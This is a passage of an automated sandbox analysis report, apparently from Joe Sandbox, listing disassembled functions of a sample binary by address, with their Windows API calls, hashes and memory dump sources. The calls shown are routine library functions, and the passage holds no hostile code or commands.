                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                            Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                            • __lock.LIBCMT ref: 00417981
                                                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                            • __lock.LIBCMT ref: 004179A2
                                                            • ___addlocaleref.LIBCMT ref: 004179C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                            • String ID: KERNEL32.DLL$pI
                                                            • API String ID: 637971194-197072765
                                                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                            Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_malloc
                                                            • String ID:
                                                            • API String ID: 1938898002-0
                                                            • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                            • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                            Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                            • String ID:
                                                            • API String ID: 3771399671-0
                                                            • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                            • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                            • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                            • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                            Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                            • _memmove.LIBCMT ref: 0044B555
                                                            • _memmove.LIBCMT ref: 0044B578
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                            • String ID:
                                                            • API String ID: 2737351978-0
                                                            • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                            • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                            Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                            • __calloc_crt.LIBCMT ref: 00415246
                                                            • __getptd.LIBCMT ref: 00415253
                                                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                            • _free.LIBCMT ref: 0041529E
                                                            • __dosmaperr.LIBCMT ref: 004152A9
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 3638380555-0
                                                            • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                            • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                            Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorInitLast
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 3207048006-625585964
                                                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                            Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • inet_addr.WSOCK32(?), ref: 0046559B
                                                            • gethostbyname.WSOCK32(?), ref: 004655A6
                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                            • _memmove.LIBCMT ref: 004656CA
                                                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                            • WSACleanup.WSOCK32 ref: 00465762
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                            • String ID:
                                                            • API String ID: 2945290962-0
                                                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                            Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                            • String ID:
                                                            • API String ID: 1457242333-0
                                                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                            Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                            Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcstok.LIBCMT ref: 004675B2
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                            • String ID: X
                                                            • API String ID: 780548581-3081909835
                                                            • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                            • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                            Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                            • CloseFigure.GDI32(?), ref: 0044751F
                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                            • String ID:
                                                            • API String ID: 4082120231-0
                                                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                            Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 2027346449-0
                                                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
